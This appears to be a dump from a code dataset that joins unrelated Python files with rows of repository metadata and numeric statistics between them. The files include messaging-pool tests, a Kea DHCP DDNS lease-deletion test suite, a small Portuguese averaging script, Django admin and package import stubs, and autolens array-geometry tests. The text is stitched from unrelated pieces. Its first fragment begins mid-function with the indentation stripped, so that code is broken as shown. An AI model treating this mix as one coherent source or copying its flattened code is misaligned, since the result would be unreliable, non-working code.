await assert_send_message(pool_http_3p, 0, 1, "Hello1!")
await assert_send_message(pool_http_3p, 0, 2, "Hello2!")
await assert_send_message(pool_http_3p, 1, 0, "Hello3!")
await assert_send_message(pool_http_3p, 1, 2, "Hello4!")
await assert_send_message(pool_http_3p, 2, 0, "Hello5!")
await assert_send_message(pool_http_3p, 2, 1, "Hello6!")
await assert_send_message(pool_http_3p, 0, 1, "Hello7!")
await assert_send_message(pool_http_3p, 0, 2, "Hello8!")
await assert_send_message(pool_http_3p, 1, 0, "Hello9!")
await assert_send_message(pool_http_3p, 1, 2, "Hello10!")
await assert_send_message(pool_http_3p, 2, 0, "Hello11!")
await assert_send_message(pool_http_3p, 2, 1, "Hello12!")
@pytest.mark.asyncio
async def test_http_3p_server_msg_id(pool_http_3p: Tuple[Pool, Pool, Pool]) -> None:
"""
Tests sending and receiving of multiple messages between three communication pools with a message id
:param pool_http_3p: collection of three communication pools
"""
await assert_send_message(pool_http_3p, 0, 1, "Hello1!", "Msg ID 1")
await assert_send_message(pool_http_3p, 0, 1, "Hello2!", "Msg ID 2")
@pytest.mark.asyncio
async def test_http_3p_server_mixed_receive(
pool_http_3p: Tuple[Pool, Pool, Pool]
) -> None:
"""
Tests sending and receiving of multiple messages of varying types between three communication pools
:param pool_http_3p: collection of three communication pools
"""
await send_message(pool_http_3p, 0, 1, "Hello1!")
await send_message(pool_http_3p, 2, 1, b"Hello2!")
await send_message(pool_http_3p, 0, 1, b"Hello3!")
await send_message(pool_http_3p, 2, 1, "Hello4!")
await assert_recv_message(pool_http_3p, 2, 1, b"Hello2!")
await assert_recv_message(pool_http_3p, 2, 1, "Hello4!")
await assert_recv_message(pool_http_3p, 0, 1, "Hello1!")
await assert_recv_message(pool_http_3p, 0, 1, b"Hello3!")
| 34.522581 | 104 | 0.712203 | 800 | 5,351 | 4.535 | 0.115 | 0.077729 | 0.115766 | 0.145259 | 0.858875 | 0.851985 | 0.841786 | 0.801268 | 0.787486 | 0.603087 | 0 | 0.033739 | 0.18576 | 5,351 | 154 | 105 | 34.746753 | 0.798944 | 0.018875 | 0 | 0.518987 | 0 | 0 | 0.075732 | 0 | 0 | 0 | 0 | 0 | 0.392405 | 1 | 0 | false | 0 | 0.050633 | 0 | 0.050633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b08e9dcded201f520efcabe437dc3e09d12804b0 | 109 | py | Python | vautoencoder/__init__.py | zamlz/dlcampjeju2018-I2A-cube | 85ae7a2084ca490ea685ff3d30e82720fb58c0ea | [
"MIT"
] | 14 | 2018-07-19T03:56:45.000Z | 2019-10-01T12:09:01.000Z | vautoencoder/__init__.py | zamlz/dlcampjeju2018-I2A-cube | 85ae7a2084ca490ea685ff3d30e82720fb58c0ea | [
"MIT"
] | null | null | null | vautoencoder/__init__.py | zamlz/dlcampjeju2018-I2A-cube | 85ae7a2084ca490ea685ff3d30e82720fb58c0ea | [
"MIT"
] | null | null | null |
from vautoencoder.trainer import train, VariationalAutoEncoder
from vautoencoder.network import VAEBuilder
| 27.25 | 63 | 0.87156 | 11 | 109 | 8.636364 | 0.727273 | 0.336842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100917 | 109 | 3 | 64 | 36.333333 | 0.969388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b0b64a3d239a584db06bc9d84f31ca117afb08e3 | 121 | py | Python | python/Mundo 1/ex007.py | eduardoranucci/Python-CursoEmVideo | a91f923f8d42e0eac7732de37136431a6db69a7a | [
"MIT"
] | null | null | null | python/Mundo 1/ex007.py | eduardoranucci/Python-CursoEmVideo | a91f923f8d42e0eac7732de37136431a6db69a7a | [
"MIT"
] | null | null | null | python/Mundo 1/ex007.py | eduardoranucci/Python-CursoEmVideo | a91f923f8d42e0eac7732de37136431a6db69a7a | [
"MIT"
] | null | null | null | notas = input('Digite duas notas: (Ex: 6.5 84) ').split()
print(f'A média é: {(float(notas[0]) + float(notas[1])) / 2}') | 40.333333 | 62 | 0.595041 | 22 | 121 | 3.272727 | 0.818182 | 0.277778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067308 | 0.140496 | 121 | 3 | 62 | 40.333333 | 0.625 | 0 | 0 | 0 | 0 | 0.5 | 0.688525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
9fee63c42f4f433e4ab661dcc1de10b82be2f813 | 11,525 | py | Python | tests/dhcpv4/ddns/test_ddns_lease_del.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 22 | 2015-02-27T11:51:05.000Z | 2022-02-28T12:39:29.000Z | tests/dhcpv4/ddns/test_ddns_lease_del.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 16 | 2018-10-30T15:00:12.000Z | 2019-01-11T17:55:13.000Z | tests/dhcpv4/ddns/test_ddns_lease_del.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 11 | 2015-02-27T11:51:36.000Z | 2021-03-30T08:33:54.000Z | """DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg
from forge_cfg import world
def _delete_lease(extra_param=None, exp_result=0):
cmd = dict(command="lease4-del", arguments={})
if isinstance(extra_param, dict):
cmd["arguments"].update(extra_param)
return srv_msg.send_ctrl_cmd(cmd, exp_result=exp_result, channel='socket')
def _resend_ddns(address, exp_result=0):
cmd = dict(command="lease4-resend-ddns", arguments={"ip-address": address})
return srv_msg.send_ctrl_cmd(cmd, exp_result=exp_result, channel='socket')
def _check_fqdn_record(fqdn, address='', expect='notempty'):
# check new DNS entry
misc.test_procedure()
srv_msg.dns_question_record(fqdn, 'A', 'IN')
srv_msg.client_send_dns_query()
if expect == 'empty':
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
else:
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', address)
srv_msg.dns_option_content('ANSWER', 'rrname', fqdn)
def _check_address_record(arpa, fqdn='', expect="notempty"):
misc.test_procedure()
srv_msg.dns_question_record(arpa, 'PTR', 'IN')
srv_msg.client_send_dns_query()
if expect == 'empty':
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
else:
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', fqdn)
srv_msg.dns_option_content('ANSWER', 'rrname', arpa)
def _get_address(mac, fqdn, address):
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', mac)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', address)
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', address)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', fqdn)
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', address)
srv_msg.response_check_include_option(81)
srv_msg.response_check_option_content(81, 'flags', 1)
srv_msg.response_check_option_content(81, 'fqdn', fqdn)
def _get_address_and_update_ddns(mac=None, fqdn=None, address=None, arpa=None):
# checking if record is indeed empty on start
_check_fqdn_record(fqdn, expect='empty')
# getting new address that should also generate DDNS entry
_get_address(mac, fqdn, address)
# checking both forward and reverse DNS entries
_check_fqdn_record(fqdn, address=address)
_check_address_record(arpa, fqdn=fqdn)
@pytest.mark.v4
@pytest.mark.ddns
def test_ddns4_all_levels_lease4_del_with_dns():
misc.test_setup()
srv_control.open_control_channel()
srv_control.add_hooks('libdhcp_lease_cmds.so')
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.10-192.168.50.10')
srv_control.config_srv_another_subnet_no_interface('192.168.51.0/24',
'192.168.51.10-192.168.51.10')
srv_control.config_srv_another_subnet_no_interface('192.168.52.0/24',
'192.168.52.10-192.168.52.10')
# let's get 3 different ddns settings, global, shared-network and subnet.
world.dhcp_cfg.update({"ddns-send-updates": True,
"ddns-generated-prefix": "six",
"ddns-qualifying-suffix": "example.com"})
world.dhcp_cfg["subnet4"][1].update({"ddns-send-updates": True,
"ddns-generated-prefix": "abc",
"ddns-qualifying-suffix": "example.com"})
srv_control.shared_subnet('192.168.50.0/24', 0)
srv_control.shared_subnet('192.168.51.0/24', 0)
srv_control.shared_subnet('192.168.52.0/24', 0)
srv_control.set_conf_parameter_shared_subnet('name', '"name-abc"', 0)
srv_control.set_conf_parameter_shared_subnet('interface', '"$(SERVER_IFACE)"', 0)
world.dhcp_cfg["shared-networks"][0].update({"ddns-send-updates": True,
"ddns-generated-prefix": "xyz",
"ddns-qualifying-suffix": "example.com"})
# kea-ddns config
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_forward_ddns('five.example.com.', 'EMPTY_KEY')
srv_control.add_forward_ddns('three.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('51.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('52.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.start_srv('DNS', 'started', config_set=32)
# let's get 3 different leases with DNS record
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:01', fqdn='sth4.four.example.com.',
address='192.168.50.10', arpa='10.50.168.192.in-addr.arpa.')
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:02', fqdn='some.five.example.com.',
address='192.168.51.10', arpa='10.51.168.192.in-addr.arpa.')
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:03', fqdn='record.three.example.com.',
address='192.168.52.10', arpa='10.52.168.192.in-addr.arpa.')
# remove all leases using lease4-del with removing ddns entry
resp = _delete_lease(extra_param={"ip-address": "192.168.50.10", "update-ddns": True}, exp_result=0)
assert resp["text"] == "IPv4 lease deleted."
resp = _delete_lease(extra_param={"ip-address": "192.168.51.10", "update-ddns": True}, exp_result=0)
assert resp["text"] == "IPv4 lease deleted."
resp = _delete_lease(extra_param={"ip-address": "192.168.52.10", "update-ddns": True}, exp_result=0)
assert resp["text"] == "IPv4 lease deleted."
# check if DNS record was indeed removed
_check_fqdn_record("sth4.four.example.com.", expect='empty')
_check_fqdn_record("some.five.example.com.", expect='empty')
_check_fqdn_record("record.three.example.com.", expect='empty')
_check_address_record("sth4.four.example.com.", expect='empty')
_check_address_record("some.five.example.com.", expect='empty')
_check_address_record("record.three.example.com.", expect='empty')
# try to add back by resending ddns, all should fail
_resend_ddns('192.168.51.10', exp_result=3)
_resend_ddns('192.168.50.10', exp_result=3)
_resend_ddns('192.168.52.10', exp_result=3)
_check_fqdn_record("sth4.four.example.com.", expect='empty')
_check_fqdn_record("some.five.example.com.", expect='empty')
_check_fqdn_record("record.three.example.com.", expect='empty')
_check_address_record("sth4.four.example.com.", expect='empty')
_check_address_record("some.five.example.com.", expect='empty')
_check_address_record("record.three.example.com.", expect='empty')
@pytest.mark.v4
@pytest.mark.ddns
def test_ddns4_all_levels_lease4_del_without_dns():
misc.test_setup()
srv_control.open_control_channel()
srv_control.add_hooks('libdhcp_lease_cmds.so')
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.10-192.168.50.10')
srv_control.config_srv_another_subnet_no_interface('192.168.51.0/24',
'192.168.51.10-192.168.51.10')
srv_control.config_srv_another_subnet_no_interface('192.168.52.0/24',
'192.168.52.10-192.168.52.10')
# let's get 3 different ddns settings, global, shared-network and subnet.
world.dhcp_cfg.update({"ddns-send-updates": True,
"ddns-generated-prefix": "six",
"ddns-qualifying-suffix": "example.com"})
world.dhcp_cfg["subnet4"][1].update({"ddns-send-updates": True,
"ddns-generated-prefix": "abc",
"ddns-qualifying-suffix": "example.com"})
srv_control.shared_subnet('192.168.50.0/24', 0)
srv_control.shared_subnet('192.168.51.0/24', 0)
srv_control.shared_subnet('192.168.52.0/24', 0)
srv_control.set_conf_parameter_shared_subnet('name', '"name-abc"', 0)
srv_control.set_conf_parameter_shared_subnet('interface', '"$(SERVER_IFACE)"', 0)
world.dhcp_cfg["shared-networks"][0].update({"ddns-send-updates": True,
"ddns-generated-prefix": "xyz",
"ddns-qualifying-suffix": "example.com"})
# kea-ddns config
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
srv_control.add_forward_ddns('five.example.com.', 'EMPTY_KEY')
srv_control.add_forward_ddns('three.example.com.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('51.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.add_reverse_ddns('52.168.192.in-addr.arpa.', 'EMPTY_KEY')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.start_srv('DNS', 'started', config_set=32)
# let's get 3 different leases with DNS record again
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:01', fqdn='sth4.four.example.com.',
address='192.168.50.10', arpa='10.50.168.192.in-addr.arpa.')
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:02', fqdn='some.five.example.com.',
address='192.168.51.10', arpa='10.51.168.192.in-addr.arpa.')
_get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:03', fqdn='record.three.example.com.',
address='192.168.52.10', arpa='10.52.168.192.in-addr.arpa.')
# remove them without removing DNS entry
_delete_lease(extra_param={"ip-address": "192.168.50.10"}, exp_result=0)
_delete_lease(extra_param={"ip-address": "192.168.51.10"}, exp_result=0)
_delete_lease(extra_param={"ip-address": "192.168.52.10"}, exp_result=0)
# and we should keep DNS records intact
_check_fqdn_record("sth4.four.example.com.", address="192.168.50.10")
_check_fqdn_record("some.five.example.com.", address="192.168.51.10")
_check_fqdn_record("record.three.example.com.", address="192.168.52.10")
_check_address_record('10.50.168.192.in-addr.arpa.', fqdn="sth4.four.example.com.")
_check_address_record('10.51.168.192.in-addr.arpa.', fqdn="some.five.example.com.")
_check_address_record('10.52.168.192.in-addr.arpa.', fqdn="record.three.example.com.")
| 47.040816 | 104 | 0.663427 | 1,661 | 11,525 | 4.323901 | 0.124624 | 0.059872 | 0.032581 | 0.025063 | 0.871206 | 0.834169 | 0.814536 | 0.744082 | 0.725146 | 0.709552 | 0 | 0.070995 | 0.18603 | 11,525 | 244 | 105 | 47.233607 | 0.694595 | 0.06308 | 0 | 0.694444 | 0 | 0 | 0.285701 | 0.129999 | 0 | 0 | 0 | 0 | 0.016667 | 1 | 0.044444 | false | 0.033333 | 0.027778 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b000b3816a8f57c6a1f71f29138eb52114ae07d7 | 48 | py | Python | yolo/model/backbone/__init__.py | f-fl0/YOLOv5-PyTorch | de5edc8f67ef355337faa8deb68c8a9ddeecdb33 | [
"MIT"
] | 125 | 2020-08-09T13:21:24.000Z | 2022-03-22T06:45:39.000Z | yolo/model/backbone/__init__.py | f-fl0/YOLOv5-PyTorch | de5edc8f67ef355337faa8deb68c8a9ddeecdb33 | [
"MIT"
] | 7 | 2020-10-16T08:40:55.000Z | 2022-02-17T10:03:29.000Z | yolo/model/backbone/__init__.py | f-fl0/YOLOv5-PyTorch | de5edc8f67ef355337faa8deb68c8a9ddeecdb33 | [
"MIT"
] | 25 | 2020-11-01T05:17:08.000Z | 2021-12-29T11:41:36.000Z | from .backbone_utils import darknet_pan_backbone | 48 | 48 | 0.916667 | 7 | 48 | 5.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 48 | 1 | 48 | 48 | 0.911111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b00effd7899d153a29354f183de30f987f0ab333 | 202 | py | Python | students/k33402/Polyakov_Andrei/LR_2/hotels/hotels_app/admin.py | Odyvannnn/ITMO_ICT_WebDevelopment_2021-2022 | 81335028ceefccb857eff175b01857ffe81c618a | [
"MIT"
] | null | null | null | students/k33402/Polyakov_Andrei/LR_2/hotels/hotels_app/admin.py | Odyvannnn/ITMO_ICT_WebDevelopment_2021-2022 | 81335028ceefccb857eff175b01857ffe81c618a | [
"MIT"
] | null | null | null | students/k33402/Polyakov_Andrei/LR_2/hotels/hotels_app/admin.py | Odyvannnn/ITMO_ICT_WebDevelopment_2021-2022 | 81335028ceefccb857eff175b01857ffe81c618a | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import User, Hotel, Reservation, Review
admin.site.register(User)
admin.site.register(Hotel)
admin.site.register(Reservation)
admin.site.register(Review)
| 22.444444 | 52 | 0.811881 | 28 | 202 | 5.857143 | 0.428571 | 0.219512 | 0.414634 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084158 | 202 | 8 | 53 | 25.25 | 0.886486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b00f0cb97554d1e3c724972814b58e001c1a9219 | 44,032 | py | Python | test/data/array/test_scaled_array.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | test/data/array/test_scaled_array.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | test/data/array/test_scaled_array.py | AshKelly/PyAutoLens | 043795966338a655339e61782253ad67cc3c14e6 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pytest
from autolens import exc
from autolens.data.array.util import array_util, grid_util
from autolens.data.array import mask as msk
from autolens.data.array import scaled_array
test_data_dir = "{}/../../test_files/array/".format(os.path.dirname(os.path.realpath(__file__)))
@pytest.fixture(name="array_grid")
def make_array_grid():
return scaled_array.ScaledSquarePixelArray(np.zeros((5, 5)), pixel_scale=0.5)
@pytest.fixture(name="array_grid_rectangular")
def make_array_grid_rectangular():
return scaled_array.ScaledRectangularPixelArray(np.zeros((5, 5)), pixel_scales=(1.0, 0.5))
class TestArrayGeometry:
class TestArrayAndTuples:
def test__square_pixel_array__input_data_grid_3x3__centre_is_origin(self):
data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)
assert data_grid.pixel_scale == 1.0
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
assert data_grid.arc_second_maxima == (1.5, 1.5)
assert data_grid.arc_second_minima == (-1.5, -1.5)
assert (data_grid == np.ones((3, 3))).all()
def test__square_pixel_array__input_data_grid_rectangular__change_origin(self):
data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((4, 3)), pixel_scale=0.1, origin=(1.0, 1.0))
assert (data_grid == np.ones((4, 3))).all()
assert data_grid.pixel_scale == 0.1
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.4, 0.3))
assert data_grid.arc_second_maxima == pytest.approx((1.2, 1.15), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((0.8, 0.85), 1e-4)
data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 4)), pixel_scale=0.1)
assert (data_grid == np.ones((3, 4))).all()
assert data_grid.pixel_scale == 0.1
assert data_grid.shape == (3, 4)
assert data_grid.central_pixel_coordinates == (1.0, 1.5)
assert data_grid.shape_arc_seconds == pytest.approx((0.3, 0.4))
assert data_grid.arc_second_maxima == pytest.approx((0.15, 0.2), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((-0.15, -0.2), 1e-4)
def test__rectangular_pixel_grid__input_data_grid_3x3(self):
data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(2.0, 1.0))
assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.arc_second_maxima == pytest.approx((3.0, 1.5), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((-3.0, -1.5), 1e-4)
def test__rectangular_pixel_grid__input_data_grid_rectangular(self):
data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((4, 3)), pixel_scales=(0.2, 0.1))
assert data_grid == pytest.approx(np.ones((4, 3)), 1e-4)
assert data_grid.pixel_scales == (0.2, 0.1)
assert data_grid.shape == (4, 3)
assert data_grid.central_pixel_coordinates == (1.5, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((0.8, 0.3), 1e-3)
assert data_grid.arc_second_maxima == pytest.approx((0.4, 0.15), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((-0.4, -0.15), 1e-4)
data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 4)), pixel_scales=(0.1, 0.2))
assert data_grid == pytest.approx(np.ones((3, 4)), 1e-4)
assert data_grid.pixel_scales == (0.1, 0.2)
assert data_grid.shape == (3, 4)
assert data_grid.central_pixel_coordinates == (1.0, 1.5)
assert data_grid.shape_arc_seconds == pytest.approx((0.3, 0.8), 1e-3)
assert data_grid.arc_second_maxima == pytest.approx((0.15, 0.4), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((-0.15, -0.4), 1e-4)
def test__rectangular_pixel_array__input_data_grid_3x3__centre_is_yminus1_xminuss2(self):
data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(2.0, 1.0),
origin=(-1.0, -2.0))
assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
assert data_grid.pixel_scales == (2.0, 1.0)
assert data_grid.shape == (3, 3)
assert data_grid.central_pixel_coordinates == (1.0, 1.0)
assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
assert data_grid.origin == (-1.0, -2.0)
assert data_grid.arc_second_maxima == pytest.approx((2.0, -0.5), 1e-4)
assert data_grid.arc_second_minima == pytest.approx((-4.0, -3.5), 1e-4)
class TestCentralPixel:
def test__square_pixel_grid(self):
grid = scaled_array.ScaledSquarePixelArray(np.zeros((3, 3)), pixel_scale=0.1)
assert grid.central_pixel_coordinates == (1, 1)
grid = scaled_array.ScaledSquarePixelArray(np.zeros((4, 4)), pixel_scale=0.1)
assert grid.central_pixel_coordinates == (1.5, 1.5)
grid = scaled_array.ScaledSquarePixelArray(np.zeros((5, 3)), pixel_scale=0.1, origin=(1.0, 2.0))
assert grid.central_pixel_coordinates == (2.0, 1.0)
def test__rectangular_pixel_grid(self):
grid = scaled_array.ScaledRectangularPixelArray(np.zeros((3, 3)), pixel_scales=(2.0, 1.0))
assert grid.central_pixel_coordinates == (1, 1)
grid = scaled_array.ScaledRectangularPixelArray(np.zeros((4, 4)), pixel_scales=(2.0, 1.0))
assert grid.central_pixel_coordinates == (1.5, 1.5)
grid = scaled_array.ScaledRectangularPixelArray(np.zeros((5, 3)), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
assert grid.central_pixel_coordinates == (2, 1)
class TestGrids:
def test__square_pixel_grid__grid_2d__compare_to_array_util(self):
grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.56, 0.56))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56)
assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)
def test__square_pixel_grid__array_3x3__sets_up_arc_second_grid(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=1.0)
assert (sca.grid_2d == np.array([[[1., -1.], [1., 0.], [1., 1.]],
[[0., -1.], [0., 0.], [0., 1.]],
[[-1., -1.], [-1., 0.], [-1., 1.]]])).all()
def test__square_pixel_grid__grid_1d__compare_to_array_util(self):
grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.56, 0.56))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56)
assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)
def test__square_pixel_grid__nonzero_centres__compure_to_array_util(self):
grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.56, 0.56),
origin=(1.0, 3.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56, origin=(1.0, 3.0))
assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)
grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.56, 0.56),
origin=(-1.0, -4.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56, origin=(-1.0, -4.0))
assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)
def test__rectangular_pixel_grid__grid_2d__compare_to_array_util(self):
grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.8, 0.56))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56))
assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)
def test__rectangular_pixel_grid__array_3x3__sets_up_arcsecond_grid(self):
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((3, 3)), pixel_scales=(1.0, 2.0))
assert (sca.grid_2d == np.array([[[1., -2.], [1., 0.], [1., 2.]],
[[0., -2.], [0., 0.], [0., 2.]],
[[-1., -2.], [-1., 0.], [-1., 2.]]])).all()
def test__rectangular_pixel_grid__grid_1d__compare_to_array_util(self):
grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.8, 0.56))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56))
assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)
def test__rectangular_pixel_grid__nonzero_centres__compure_to_array_util(self):
grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.8, 0.56),
origin=(1.0, 2.0))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56),
origin=(1.0, 2.0))
assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)
grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
pixel_scales=(0.8, 0.56),
origin=(-1.0, -4.0))
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56),
origin=(-1.0, -4.0))
assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)
